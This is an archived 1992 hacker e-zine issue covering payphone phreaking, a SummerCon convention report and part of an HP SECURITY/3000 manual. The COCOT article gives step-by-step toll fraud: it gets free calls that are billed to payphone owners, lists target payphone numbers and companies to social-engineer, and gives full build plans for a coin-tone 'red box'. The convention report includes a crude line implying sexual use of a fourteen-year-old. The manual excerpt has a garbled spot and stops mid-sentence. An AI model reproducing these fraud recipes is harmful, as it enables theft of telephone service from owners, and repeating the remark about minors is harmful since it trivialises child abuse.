HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / INFORM_4.ZIP / INFORM-4

Wrap

Text File | 1993-03-31 | 141KB | 3,036 lines

+=============================================================================+ | ## ## ## ###### ###### ###### ### ### ###### ###### ## ## ## | | ## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## | | ## ## ### ##### ## ## ###### ## ## ###### ## ## #### | | ## ## ## ## ###### ## ## ## ## ## ## ## ## ## ## | +=============================================##==============================+ | July 08, 1992| | [ The Journal of Privileged Information ] | | | +-----------------------------------------------------------------------------+ | Issue 04 By: 'Above the Law' | +-----------------------------------------------------------------------------+ | | |Informatik--Bringing you all the information you should know... | | and a lot you shouldn't... | | | +=============================================================================+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - *DISCLAIMER* Informatik Journal is printed for informational purposes only. We do not recommend or condone any illegal or fraudulent application of the information found in this electronic magazine. As such, we accept no liability for any criminal or civil disputes arising from said information. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - =========================================== ============== - CONTENTS - =============== ================ Issue 04 ================= ======= Release date July 08, 1992 ===== =========================================== 01) Issue #4 Introduction By: Informatik Staff 02) COCOTS and the COMBO box By: Count Zero 04) SummerCon 1992 By: Holistic Hacker 05) HP's SECURITY/3000 (part 2 of 3) By: Sterling 06) The Demon Dialer By: Vodka 07) The Kerberos Authentication System - An Intoduction By: x0d 08) Computer Crime Investigation By: C. D. Morgan 09) WAX or the Discovery of Televison Among the Bees By: David Blair 10) Tid-Bytes--Misc Contributions By: Informatik Staff 11) Submission, Subscription and Publication Information By: Informatik Staff - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - /* Introduction */ By Mack Hammer Welcome to Informatik Issue #4. Thanks to some submissions, we are able to release this issue scarcely two months after issue 3. We hope to continue providing the same informative and entertaing information that has marked the last three issues. Keep those submissions coming! This month we are focusing on hacking and phreaking, although we plan on printing information on other high technology hacks in the future. We also have an exceptionally interesting and useful article from C. D. Morgan about computer crime investigation. In Tid-Bytes this issue, we have information on the final run of the infamous LOD T-Shirts, and we have the fabulous Spot-the-Fed Word Search, courtesty of the Informatik Staff. For your enjoyment, we have included a report on Summercon by Holistic Hacker, Informatik's reporter who was live on the scene. Unfortunately, neither of the members of our illustrious editorial staff could make it to the Con this year. Everyone I have spoken to has had nothing but raves for the Con, and it seems to once again have been a success. I heard there were approximately 80 people there, although I can't be sure since I don't have a guest list. For this, we have Knight Lightning to thank. In the best interests of Phrack magazine, he has decided not to give us the guest list, and I hope to one day have the opportunity to repay his generosity. Once again, we appreciate your readership and hope you like the magazine. We welcome any suggestions, comments and submissions. See the end of this magazine for more information. Enjoy, Mack Hammer & Sterling [Editors] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - COCOTS and COMBO-box by Count Zero of Renegade Legion Here's my phile on how to build a redbox. The file is ALSO about COCOTS...but is has DETAILED plans for the COMBO-box COMBO-box = red box + clear box here it is...enjoy! R e n e g a d e L e g i o n * * T e c h n i c a l R e p o r t s * * * R * * L * * * Eastern Western .... Net Runner ........ Echoman The Knight ......... Sirus Kingpin ... .... Highlander ... .... Count Zero ..... Iceberg .... The Gypsy .... Cursor ... ... Rogue ... ... White Knight .. ... Nemesis ... Presents Report Number: 4.0 COCOTS: Uses for privatly operated public telephones. How to make free calls use their maintenance features, and plans for a tone dialer to fool COCOT security systems. Author : Count Zero Editor : Net Runner System : COCOT Payphones Uses : Free calling to most of the world Dialups : One per payphone Port : 300 bps, 7 bits, Even Pairity, 1 Stop Bit Emulation: TTY Thanks To: Count Zero for this extensive document. Greets To: Magic Man, Darby, JT, Muppet, Madmike, Falcon, George Bush, FBI Agent, Net Runner, Canine, Plutus, Midnight Mage, Yellow Jacket Old Pink, The Knight, Spiritwalker Renegade Legion Sites --------------------- - tmp down - Night City < RL World HQ > - private - Night Elite < ERL Headquarters > Contact The Knight or Net Runner for the number to Night Elite So you're walking down the street and you see a payphone gotta make an important call, so you dig into your pocket to get a dime picking up the handset, you suddenly notice that the payphone wants a QUARTER for a local call! What the hell, and WHERE did this synthesized voice come from? Let's make this phile short and to the point a COCOT is an acronym for Customer Owned Coin Operated Telefone in other words, a COCOT is a fone OWNED or RENTED by a PAYING CUSTOMER (most likely, a hotel or donut shop) a COCOT is NOT a normal payfone the Telco doesn't own it, and the actual fone line is usually a normal customer loop (unlike payfones, where the fone line is a "special" payfone loop, allowing the use of "coin tones" to indicate money dropped in more on this later) SO!..A COCOT may LOOK and SMELL like a telco payphone, but it is NOT. * Why do COCOTs exist? Simple $$$$$$$! A customer owned payfone is money in the bank! You pay MORE for local calls and long distance is typically handled by sleazy carriers that offer bad/EXPENSIVE service the owner/renter of the COCOT opens the coinbox and keeps the money him/herself! Also, a particularly SLEAZY quality of a COCOT is the fact that it DOES NOT RECIEVE INCOMING CALLS this, of course, is because of $$ if people are calling IN to a COCOT, the COCOT is not making money and businesses always want to make as much $$ as possible...even if it hurts the consumer (think about it..it REALLY sucks calling someone at home from a COCOT, then not be able to have him/her call you back to save $$ "Guess I'll have to keep feeding the COCOT quarters!") * Where is a good place to look for COCOTs? Outside Dunkin Donut shops, restaurants, clubs, bars, and outside/inside hotels "convenient" locations * How do I figure out if I have found a COCOT? Simple a COCOT will have NO TELCO LOGOS on it no New England Telephone symbols it may look just like a Telco fone chrome, with blue stickers and all that ALSO a COCOT typically charges MORE for a local call than a regular Telco payfone (in Massachusetts, local calls are a dime, in places like NYC, they are 25 cents.) a COCOT will most often have a synthesized voice that asks you to "please deposit 25 cents" or whatever ALSO some FaNcY COCOTS will not look like payfones at all some in hotels have weird LCD displays and look totally different but the ALWAYS charge you more than a normal payphone. * OK, I found this weird payphone in Boston that wants a quarter, and this synthesized voice is harassing me when does the phun begin? Soon..first of all, you must understand that the COCOT is a mimic. Essentially, it wants you to think that it is just a plain ol' payfone pick up the handset..hear that dialtone? hah! that dialtone is fake, synthesized by the innards of the COCOT you are at the mercy of the COCOT. Remember a COCOT runs off of a normal customer loop so unlike a Telco payphone where you must deposit money to generate coin tones that are read by the CO, the security of a COCOT depends solely on the COCOT fone itself its as if you took your own fone and put a sign on it saying "Please put 10 cents in this jar for every call you make." COCOTS are not naiive they won't let you near the unrestricted dialtone until you fork over the cash-ola heh heh. Or so they THINK! See, the Achilles heel of the COCOT is the FACT that ALL PAYFONES MUST LET YOU MAKE 1-800 CALLS FOR FREE! It's not just a fact, it's the LAW so, now pick up the handset again and place a 1-800 call any 1-800 number will do. When they answer at the other end, just sit there do nothing ignore them. wait for them to hang up the fone here's an example. <DIAL 1-800-LOAN-YES> <Ring, Ring>.....<click> "Hello, you wanna buy some money? Hello? HELLO?!" <CLICK> <You will now hear some static and probably a strange "waffling" noise, like chh,chh,chh,chh,chh> <CLICK>......DIALTONE! NOW!.what have we got here? a dialtone? yes, you guessed it, the dialtone you now hear is the UNRESTRICED dialtone of the COCOT's customer loop. * So what?..So I got an "unrestricted dialtone"...big deal? Meathead! with an UNRESTRICTED dialtone, all you need to do is place a call via DTMF tones (the tones a touch-tone keypad generates) now, try dialing a number with the COCOTs keypad WHOA! waitasec, no sound! this is a typical lame attempt at protection by the COCOT. Just whip out your Radio Shack pocket tone dialer, and try calling a number ANY number place it just as if you were calling from a home phone call a 1-900 sex line call Guam you are FREE and the COCOTs customer loop is being billed! ***NOTE: some COCOTS are more sophisticated at protecting themselves..some will RESET when they hear the dialtone to get around this, make a loud hissing sound with your mouth into the mouthpiece after the 1-800 number hangs up also, get your tone dialer ready near the mouthpiece when u hear the dialtone, quickly dial the first digit of your number to call if you hiss loudly enough, you MAY be able to mask the sound of the dialtone and prevent the COCOT from resetting and once you dial the first digit of the number you are calling, the dialtone will disappear (naturally) ok, you can stop hissing like an idiot now finish dialing your PHREE fone call. Also, some COCOTs actually disable the handset after a call hangs up (in other words, you can't send DTMF tones thru the mouthpiece) oh well, better luck next time. HOWEVER MOST of the COCOTs I have run across ONLY disable the DTMF keypad.. so all you need is a pocket dialer to circumvent this! OTHER THINGS TO KNOW: Sure, you can't call a COCOT, but it DOES have a number to find out the COCOT's number, call 1-800-933-3258..this automated ANI service will tell you the number you're dialing from now, try calling the COCOT from another fone you will hear one of 2 things: 1) synthesized voice "Thank you"...CLICK..<hang up> 2) weird carrier A COCOT's number is ONLY used by the company that BUILT the COCOT by calling up a COCOT, a tech. can monitor its functioning, etc in case (1), you must enter a 3 or 4 digit password and then you'll get into a voice menu driven program that'll let you do "maintenance" stuff with the COCOT in case (2), you are hooked to the COCOT's 300 bps modem (YES, a MODEM in a PAYFONE).. likewise, if you can figure out the communication settings, you'll be into the COCOT's maintenance routines. Personally, I haven't had much luck (or patience) with calling up and hacking COCOT maintenance functions. I just like making free fone calls from 'em! COCOT ETIQUETTE: Now, remember, you are making free fone calls but SOMEONE has to pay for 'em...and that is the OWNER the COCOT's customer loop is billed the cost of the calls, and if the OWNER sees a big difference in the profits made on the COCOT (profit=coins from COCOT - bill from Telco for customer loop)..they'll know SOMETHING is up so moral is DON'T ABUSE THEM! don't call a 1-900 number and stay on the line for 12 hours! If a COCOT is abused SEVERLY, an owner will eventually LOSE money on the damn thing!, and that means BYE BYE COCOT also, remember that a RECORD of ALL LONG DISTANCE calls is made to the COCOT's customer loop..and COCOT companies will sometimes investigate "billing discrepencies" so don't call anyone you personally know unless you are sure they are "cool". <RING RING> "Hello?" "Hello...this is Cointel, Inc....we'd like to ask you a few questions about a call you received from Boston on 2/12/91. Could you tell us the name and address of the person who placed the call?" COOL dude -> "What?...I don't remember...go to hell! <SLAM>" MEATHEAD -> "Uh, sure, his name is John Smith...you want his address too?" Get the picture? Good... COCOTs are a great resource if we use them wisely like our environment, we gotta be careful not to plunder them make a few long distance calls and then leave that particular COCOT alone for awhile chances are, your bills will be "absorbed" by the profit margin of the owner and probably ignored but the smaller the owner's profit margin gets,the more likely suspicions will be aroused 'nuff said! I have found COCOTs EVERYWHERE some of my personal favorites are on Route 1 North of Boston check out the Dunkin Donut shops and the Burger King also, in front of the Rat in Kenmore look around they are lurking everywhere. (BUT..COCOT technology is relatively new..don't expect them EVERYWHERE..I know many towns that have NONE..check out big cities....) Here are some numbers of COCOTs: Kenmore Square,Boston,MA The Rat 617/247-8195 617/247-7913 617/247-8208 617/247-9437 Random ones: 617/720-4430 617/233-9872 Here are some companies that deal with COCOTs...try out your social engineering skill on them: Cointel, Inc. Int'l Telecharge, Inc. 130 Broadway St. P.O. Box 50579 Somerville, MA Dallas, TX 02145 1800/999-5152 1800/322-7741 As for a Tone Dialer, don't leave home without one!...a true phreak always has a DTMF tone dialer at hand..along with a red box!....My personal favorite is the COMBO-BOX (red box plus DTMF) take a Radio Shack 33-memory Pocket Dialer.. open up the back...remove the little 3.579 MHz crystal (looks like a metal cylinder..unsolder it)...solder on a couple of thin, insulated wires where the crystal was attached...thread the wires thru one of the "vents" in the back of the tone dialer....get ahold of a 6.5536 MHz crystal (available thru Fry's Electronics, 89 cents a piece, phone number 415/770-3763)..go out and get some quick drying epoxy and a Radio Shack mini Toggle Switch, DPDT, cat. no 275-626 Close the tone dialer, with the two wires sticking out one of the back vents.. screw it up tight...now, attact the crystals and wires to the switch like this with solder: I^^^^^I I xx <3.579 crystal>small one I I toggle switch -> oooooo X xxxxs <two wires> I I I xx <6.5536 crystal>big one I I ^^^^^^ Each "xx" prong in the diagram is actually TWO prongs....hook up the two leads from the crystals to separate prongs (same with the wires). Now, epoxy this gizmo to the side of the tone dialer use ALOT of epoxy, as you must make the switch/crystals essentially EMBEDDED in epoxy resin. like this: Front View -> ---------------------- I I T <-toggle switch I oo oo oo I--- I I | I I--- I 1 2 3 I B s <-two crystals(b=big,s=small) I I | in epoxy "blob" I 4 5 6 I _ I I I 7 8 9 I ^two wires running to back of unit I I I * 0 # I I I ---------------------- ---------------------- Back View -> I I T I o ---- o-----------------------vent (1 of 4) --- I / | I s B I | | I 2 wires -> \-----o ---- o I running into I I vent I I I I I I I I ---------------------- Make sure the epoxy is really gobbed on there..you want to be certaint the switch and crystals are firmly attached and secure in a matrix of epoxy (it doesn't conduct electricity, so don't worry about shorting out the connections to the toggle switch)...just don't gum up the action of the switch! Basically, you've altered the device so you can select between 2 crystals to generate the timing for the microprocessor in the tone dialer... Now turn on the tone dialer NOW, you can easily switch between the 2 crystal types the small crystal will generate ordinary DTMF tones but, by simply flicking the switch, you generate HIGHER tones now, using the memory function of the tone dialer, save 5 "*" in the P1 location, now dial the P1 location using the BIG crystal, sure sounds like the tones for a QUARTER, doesn't it! Carry this around with you always will come in handy with both Telco payphones AND COCOTs! no Phreak should be without one! Anyway, that about wraps it up for me references for this article include Noah Clayton's EXCELLENT article on COCOTs in 2600 Magazine, Autumn 1990.. also, The Plague's article on Tone Dialer conversion to Red Box, 2600 Magazine, Summer 1990 (Which inspired me to create the COMBO-BOX (red box PLUS DTMF dialer)...I strongly urge people to subscribe to 2600 Magazine...call their office line for more details ->516/751-2600... Remember..you can READ all you want, but if you don't get your ASS out there and try stuff out for yourself, you are nothing but a POSER! Enough said...oh, also, I heard that SOME COCOTs have handsets in them that can be accessed..in other words, you call the COCOT and if you hit "0" or something else, the earpiece of the handset is activated and you can listen in on what's goin on around the COCOT...I dunno...never worked for me, but try these 2 "suspected" numbers...212/268-7538, -6129..try hitting "0" and listen for any sounds...I could be wrong, I could be right..I could be black, I could be white.... That's all folks remember, the purpose of this phile is to ENLIGHTEN, and I in no way condone or encourage illegal activities...so don't blame me for ANY MESS you get into this phile offered strictly as INFORMATIONAL ONLY! I am in no way responsible for your ass! Also, I am not into wanton destruction, vandalism, or fraud..seek the truth, and leave nothing but footsteps. Remember...SHARE THE WEALTH...INFORMATION IS POWER...SHARE IT! And drink massive amounts of Jolt cola...trust me, it's good for you. Keep the faith, and never stop searching for new frontiers.... .................................. ..oooOO Count Zero OOooo.. .................................. ----------------------------------------------------------------------------- EDITOR'S NOTE: (Renegade Legion) We do NOT condone fraud, destruction of computer data or tangeble items. We do not condone information hoarding, and accumulations stacks of informatio n on individuals which corporations have no business accumulating. Companies are free to give your information to other companies. And we feel vindicated in examining the information about ourselves firsthand! Down with buerocracy! Hail Eris! All Hail Discordia! -Net Runner, Precentor of Renegade Legion - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - SummerCon 1992 by Holistic Hacker Phrack's SummerCon 1992 turned out great. Unforunately neither of our editors could attend due to pesky problems like work, school, and an extreme lack of cash. Never fear though, our on-the-spot reporter Holistic Hacker gives us the low-down on this year's summer bash. /* From June 26 through June 28, the Executive International Inn in St. Louis, MO, was overrun by the participants of SummerCon '92. This year's Con was one of the largest in attendance - Knight Lightning estimates that over 75 people showed up for the activities this year. Friday - June 26 Doc Cypher and I arrived around 4:30 PM and found the hotel already full of action. The much-ballyhooed Phrack SummerCon t-shirts had already sold out by the time we had arrived (although Dispater is making another print run of them). Alcohol was already in presence, and people stood in the halls acquainting themselves with one another. Friday night was dominated by 'Batman Returns.' Many hackers went to see the movie throughout the night, leaving pockets of other hackers scattered around the hotel. Some people contented themselves by exploring the hotel, the parking garage, and the adjoining Mark Twain Bank. After a brief trip to the Radisson for the free buffet of mini tacos (umm-umm) and a stop by a local liquor shop, the remaining hackers were ready to party. Led by the always-partying Hunter, we staked out the pool as hacker turf. This is were we found the infamous hacker groupies of SummerCon, but more about them later. After bullshitting and drinking by the pool for a while, some peopl went out trashing, others went to the bar, and some sat around talking about various systems and hacks. Constant cries of 'Let's go get some women!' were heard throughout the night. The majority of the people at the hotel eventually made it to the RDT room located at one end of the hotel. Everyone sat around and amused themselves with the antics of the previously-mentioned Cyber Nymphs, a seventeen-year-old and her fourteen-year-old-friend. The seventeen-year-old eventually disappeared, never to be seen again, while the fourteen-year-old tried to hug everyone who came near her. Rumor has it they were both done by several hackers that night... Around 2:00 AM, most people started to crash in preparation for the actual conference on Saturday. Saturday - June 27 Due to many late-risers and conflicting times, the conference was rescheduled from 12 noon to 1:00 PM. About 60 hackers filled the conference room on the second floor of the hotel. Sample copies of Cybertek and Security Insider Report were available, as was an ad for Intertek. Copies of Erik Bloodaxe's Computerworld article and a story from The Boston Business Journal were present as well. Emmanuel Goldstein was present hawking back issues of 2600. Knight Lightning started off the conference with the banging of a linesman's set on the table. He expressed appreciation for the number of people who showed up, roughly two or three times as many as had showed up at past SummerCons. Rambone made a quick note of how the activites couldn't get any worse than the previous night's, with much joking about the hacker chicks coming from all. Dispater welcomed everyone to the Con. He also expressed his gratitude for RDT's help wit Phrack over the last few months. Dispater then made mention in passing that the government had recently purchased the hotel. Buttons from RDT and h0d were mentioned, along with the Phrack SummerCon t-shirts and the 2600 t-shirts. Gatsby was the first speaker of the Con, discussing the San Diego '1000-member hacker ring' that many people have heard tale in the last few months. A hacker by the name of Prisoner from Long Island flew to San Diego to see a girl, supposedly on a carded ticket. While there, he broke into a Zale's jewelry store and pulled credit card info from their point-of-sales system. He soon left his rented room, leaving behind the credit card printouts which his landlord reported to the San Diego Police Department. He was soon met at the Sleepy Time Motel in San Diego by the police. The FBI was soon brought into the case, and he was kept at the Marriot Hotel for two weeks. While there, he called several systems, including Scantronics. In the case of the investigation, a guy going by The Crypt Keeper was intereviewed. When told by Barry Sadler of the San Diego PD that he was interfering with the investigation, he soon opened his mouth and used Gatsby's account to give the feds info on Scantronics. Bufferings from Scantronics were used as probable cause to get a search warrant for the board. Kludge now has a couple of charges against him, thanks to the narc efforts of The Crypt Keeper. Emmanuel Goldstein of 2600 Magazine was the next to speak. He related how 2600, in eight years of existence, had never been directly harassed by the government. Emmanuel also mentioned how 2600 was in good legal shape since it was a printed publication, unlike Phrack. He told us how 2600 is in need of articles, and how 2600 will print anything leaked and/or sent to them. Emmanuel mentioned that 2600 had never been sued, although they have been threatened with legal action before. It was noted that 2600 currently has a mailing list of 1500 members with newstand circulation of 3000. He talked a little bit about how 2600 issues press releases and information in order to alert people about unsecure systems, but that the information is never acted upon until something happens. People would always blame the magazine for giving the details on how to do something (such as opening Fed Ex drop boxes), but never took action to correct the problem. Ctrl-C was the next speaker of the Con. He discussed being caught by Michigan Bell security and how he started working in security for Michigan Bell. After some shake-ups in the management, the new manager fired Ctrl-C. The Secret Service then decided to investigate and dragged him down to the local office. A year-and-a-half later, he has not heard anything else from the Secret Service and considers himself in the clear He doesn't do anything with computers anymore, 'that's his story and he' sticking to it.' Signal Surfer spoke next of some beta-test software that he had available at the Con. It was a Usenet news reader 'easy enough for your mother' that was being developed by the company he works for. He also talked about how hackers are some of the best talent in the computer world and that they can make some great employees. Signal Surfer said that he'd be happy to talk to anyone who was interested in getting a legitimate job in the computer industry. The sysop of Blitzkrieg BBS (sorry d00d, didn't catch yer name!) spoke next about a friend and him getting busted for carding a laptop, and the subsequent investigation. This is the same guy who also puts out the new incarnation of TAP magazine. He related how the feds tried to pressure him into giving them the subscriber's list. He also talked about how a portion of his mail comes to him opened. Some great legal manueverings there. The feds also tried to get him to turn narc on a computer fencing ring in the area. He mentioned how he still has the TAP membership logs and everyone will get the issues they have paid for. The staff from Cybertek spoke next about the delays in the new issue of their zine. They mentioned that they have more time to work on it now, and that there will hopefully be no more delays in the publication of the new issue. Somewhere amidst all the talks, Agent Steal gave a very informative talk about his dealings with Kevin Poulson, aka Dark Dante. If you weren't there, you missed quite a story. Agent Steal related how Kevin was breaking into CO's on an almost daily basis and some of the equipmen he had set up in his apartment to prevent traces. He related how he is now out of prison and is looking forward to something different. He may have been talking about the Ozzy concert later that night... Erik Bloodaxe took the podium next to talk about what happened to Comsec, the MOD mess, and other topics in general. Doc Holiday spoke up occasionally from his seat towards the back of the room. ErikB said that the main problem Comsec faced was the debt they ran up trying to start the business. This was mainly caused by one of their partners not putting up the money he promised and not having many paying clients. Erik then explained how MOD affected Comsec and the lives of some of his and Doc Holliday's family members. Erik also related some documents he had brought with him, including the termination letter of the president of Comsec and his article in a past Computerworld, among other item. A debate then started over what a 'hacker-turned-businessman' can do when another hacker starts attacking them. The debate over this and other topics lasted over half-an-hour until we moved on to the final talk. Drunkfux talked a bit about some of the shit that happened at the the hotel after the last HoHoCon. Bascically, the management tried to charge him for a hole knocked in a wall due to the conference room door being knocked into it. After he refuted this charge, the hotel then had several holes knocked in the walls of the conference room and tried to charge him for these as well. They also complained about a mysterious fire which they could not locate. dFx contacted a lawyer who soon had the hotel in his firm grip. A few days later, the hotel sent two agents out to his house to apologize and give him some free travel vouchers for the Hilton of his choice. With this, the official conference was over and activities soon got underway again. After the official conference talks, many people left the hotel to eat, trash, or explore the city. Frosty and some of the other GCMS - MechWarriors started a game of Hacker in the conference room. Many people soon made it over to the Northwest Plaza, home of some of the shittiest dress codes in the Midwest. About ten of us were sitting around when a security guard informed a few of us that we couldn't wear our hats backwards and pointed out the cryptic Rule 4 - 'All clothing must be worn in the way it was meant to be worn.' Go figure - I always thought hats were worn on your head. After a bit of this, Emmanuel Goldstein went to the local Sears store and bought a few of us St. Louis baseball caps. With a few more backwards-hats, we strolled around the mall, soon catching the eye of another always-alert security guard. After telling us to turn our hats around and dropping her walkie-talkie trying to call for backup, Emmanuel and a few of the guards began to discuss this Rule 4. One of the guards mumbled about how a case about this matter has gone to appellate court, but I haven't been able to find out anything certain of this. After being told that this policy was in fact posted at all entrances, we were kindly told to leave the store. On our walk around the mall, we saw the mysterious rule board in two out of approximately 12 entrances. One more thing, Rule 6 mentioned that there was to be no playing of cellular phones - I think ErikB broke this rule when he played 'Mary Had a Little Lamb' on the keypad of Signal Surfer's cellular phone. We then drove back to the Con and related the story to the people we saw there. With nightfall, the activites once again began to happen around the hotel. Many trashing expeditions went out that night, some coming back with most el1te info. We showed some videos in my room (and later Dispater's), including a re-run of 'Rudolph the Heavy-Metal Reindeer,' some news programs, including the 'Unsolved Mysteries' report on Kevin Poulson, and a screening of 'ESS Phun,' a trek inside a CO and the fun that can result. After 10:00 many people began to split up. Doc Cypher and I took off to pick up my girlfriend from Illinois and when we got back around 1:00, there had been some definite going-ons. We heard reports about firecrackers being set off in the pool and a smoke bomb being set off on the second floor of C-block. It was much later that John Frazel, security guard supreme, began making his famous 'Get back in your rooms, or you're going to jail' speech. Most people congregated in the hall near the RDT room once again and engaged in swapping stories once again. Bags of discarded trashing treasure started piling up in the stairwell as the night went on. Hacking of various systems continued to take place in the so-called SummerCon HQ. Sunday - June 28 I took off again to Illinois about 4:30 in the morning, with most of the hotel finally at rest. When I returned about 6:00, I returned to my room to find all my stuff packed and Doc Cypher ready to get the hell out of there. A report that there were '4000 cops' outside the hotel was floating around the buildings. As we had planned to leave at 8:00 AM, this was no big deal for us. After checking out and retrieving my VCR from Dispater, we left the hotel to find no cops, just a few Navy officers scattered here and there. We then hit the road and said goodbye to SummerCon '92. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ::::::::::::::::::::::::::::::::::::::::::::: :: HP's 'SECURITY/3000' System (part 2/3) :: :: :: :: by Sterling :: :: :: ::::::::::::::::::::::::::::::::::::::::::::: SECURITY/3000 is a third party security package for use on HP 3000 series computers. It replaces several commands and bundles several utility programs to monitor system security. HP's are quite a common site on X.25, so this may add to your understanding of what's going on. Part 1 of this manual can be found in Informatik #02. In this second section, I will discuss several of the companion utilities that SECURITY/3000 uses to protect logins and passwords. OBSOL - MPE passwords OBSOLESCENCE system ***************************************** INTRODUCTION ~~~~~~~~~~~ A password is only as good as the people who are supposed to keep it secret. The fact of the matter is that in most shops, MPE passwords get out "through the grapevine" within a month or so at most. By the end of the month, the passwords have to be changed to ensure security. OBSOL, the Password Obsolescence System, guarantees that passwords are changed frequently, and system security is thus maintained. HOW OBSOL WORKS ~~~~~~~~~~~~~~ An Account Manager or the System Manager determines the number of days a given password (user, group, or account) is valid before it must be changed (the period called "obsolescence days"), and the number of days before the password becomes obsolete that the user will be warned that the password will expire (the period called "warning days"). Whenever a user logs on during a period when the password should be changed, he is notified on what date the password will expire and then is allowed on the system. If he logs on after the password has expired, he is disallowed access to the system. Every time an Account or System Manager changes a user, group, or account password, he is prompted for the "obsolescence days" and "warning days" which should be applied for that password, and the password obsolescence system is updated automatically. WHAT HAPPENS AT LOGON TIME ~~~~~~~~~~~~~~~~~~~~~~~~~ Whenever a user logs on during a period when either or both his user or account passwords should be changed, he is notified that the password(s) will expire and is then allowed on the system, as follows: *********************************************************** Your xxxxxxxx password will expire on mm/dd/yy! *********************************************************** where 'xxxxxxxx' is the type of password (user, group or account), 'mm/dd/yy' is the obsolescence (expiration) date. If a user logs on after the group or account password has expired, he is disallowed access to the system and the following message is displayed: *********************************************************** Your xxxxxxxx password has expired! You will not be able to sign on until it is changed. *********************************************************** where 'xxxxxxxx' is the type of password (user, group, account). The password obsolescence system will not warn a user about the group password if the group he is logging into is his home group--this is in keeping with MPE, which does not prompt a user for his home group password, even if one exists. By the same token, a user will not be disallowed access to a group, if that group is his home group, even if the password has expired. In general, a user will be warned to change only those passwords which he is prompted for at logon. OBSOL/PASCHG INTERFACE ~~~~~~~~~~~~~~~~~~~~~ OBSOL works well with PASCHG, the system which permits users to change their own MPE user passwords, since with PASCHG the Account Manager is not burdened with having to change dozens of passwords at the end of every month. In order to provide additional ease in making certain that passwords are changed, OBSOL may be configured to automatically run PASCHG during the password warning period. ACTIVATING OBSOL ~~~~~~~~~~~~~~~ The core of the password obsolescence system is two UDC files. The first one is an option logon UDC which runs the program OBSLOG.PUB.SECURITY which checks whether any of the passwords of the user who is logging on are obsolete. The UDC is stored in the file OBSOLUDC.PUB.SECURITY OBSLOGON OPTION LOGON, NOBREAK SETJCW SECURITYANSWER=0 RUN OBSLOG.PUB.SECURITY IF SECURITYANSWER = 1 THEN BYE ENDIF and should be set for a user, account, or the entire system; e.g. to set it for the logon account, the Account Manager can do the following: :SETCATALOG OBSOLUDC.PUB.SECURITY;ACCOUNT It's recommend that the system manger set this UDC on an account-by-account basis. The second set of UDCs redefines all MPE :NEWUSER, :NEWGROUP, :NEWACCT, :ALTUSER, :ALTGROUP, and :ALTACCT commands to run the program OBSCHG.PUB.SECURITY which updates the password obsolescence system whenever one of these commands is executed. These UDCs are stored in the file OBSUDC.PUB.SECURITY and are usually set systemwide so that all :ALTxxx and :NEWxxx commands are redefined throughout the system. To do this, log on as MANAGER.SYS and execute the command :SETCATALOG OBSUDC.PUB.SECURITY,.. your UDCs...;SYSTEM CONFIGURING OBSOL ~~~~~~~~~~~~~~~~ The default "obsolescence days" and "warning days" is set by declaring them in the SECURITY/3000 configuration file SECURMGR.PUB.SECURITY as follows: OBSDAYS=obsdays WARNDAYS=warndays where 'obsdays' is the number of days that a password is valid for before it is obsoleted (default is '30') and 'warndays' is the number of days before a password expiration is warned about. EXCLUDING CERTAIN PASSWORDS FROM OBSOLESCENCE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If you want to have some passwords expire automatically and others not, you can accomplish this by declaring a long period of time (e.g. 1000 days) as the "obsolescence days" for that password. Only entities (users, groups, and accounts) in MPE which have passwords are included in the password obsolescence system--those without MPE passwords are not included in the internal data base when it is filled. In keeping with this, when a password is removed from an entity in MPE, the entry corresponding to that entity is removed from the data base. Similarly, when anDS; ADDING AND ALTERING USERS, GROUPS, AND ACCOUNTS When adding or altering users, groups, and accounts in OBSOL, the :NEWUSER, :NEWGROUP, :NEWACCT, :ALTUSER, :ALTGROUP, and :ALTACCT commands are used as in MPE, except the syntax is slightly different: the body of the command must be enclosed in quotation marks, as in :NEWUSER "CLERK;PASS=XYZZY;CAP=ND,SF,IA,BA" and :ALTACCT "DEV;PASS=FOO;CAP=AM,AL,GL,ND,SF,IA,BA,PH,DS" These commands are redefined by UDCs to not only execute the command but, if the command changes a password, to inform OBSOL that the password has been changed and that it should be obsoleted when the "obsolescence days" have passed. Therefore, it is not necessary to explicitly run a special program to inform OBSOL every time a password is changed. When you execute a :NEWxxx or :ALTxxx commmand, the command is processed normally and you are prompted for "obsolete days" and "warning days" as follows: Password is currently obsoleted every od days; new value: Where 'od' is the current "obsolescence days". Enter the new period for which the password should be valid before it is obsoleted, or hit <return> to retain the same value as before. Warning period before obsolescence is wd days; new value: Where 'wd' is the current "warning days". Enter the new number of days before a password expires that the user should be warned to have the password changed, or hit <return> to retain the same value as before. So, for example, if you want to change the GAMES account password, and you want the new password to be obsoleted every 2 months (60 days) and a warning message that the password is about to expire displayed during the 5 days before the password will expire, execute the command: :ALTACCT "GAMES;PASS=FUNTIME" and respond to the prompts as follows: Password is currently obsoleted every 30 days; new value: 60 Warning period before obsolescence is 7 days; new value: 5 For a more critical password on a more sensitive account, such as the PAYROLL account, you may want to obsolete the password every 14 days with 3 days of warning, as follows: :ALTACCT "PAYROLL;PASS=BIGBUCKS" and then answer the prompts as follows: Password is currently obsoleted every 30 days; new value: 14 Warning period before obsolescence is 7 days; new value: 3 WHAT IS DONE WHEN A PASSWORD EXPIRES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If a user password has been obsoleted (expired), the user should have his Account Manager change the password to permit the user to log on. If an account password has been obsoleted, the Account Manager should have the System Manager change that password to permit users of that account to log on. In a situation where a user password of an Account Manager or of the System Manager has expired, there is no one with the capabilities to change the password; therefore, it is necessary to modify the internal data base according to the following example: 1. :HELLO MANAGER.SECURITY,DATA 2. :RUN QUERY.PUB.SYS >BASE=OBSOL PASSWORD= >>; << enter a ';' >> MODE = >>1 3. >FIND USER+ACCT ="MANAGER VESOFT " << if USER password >> >FIND ACCT+GROUP="VESOFT DEV " << if GROUP password >> >FIND ACCT=VESOFT << if ACCOUNT password >> 4. >REPLACE OBS-DAYS="500"; END >EXIT This will temporarily "un-obsolete" the password, allowing the Account or System Manager to log on. Once logged 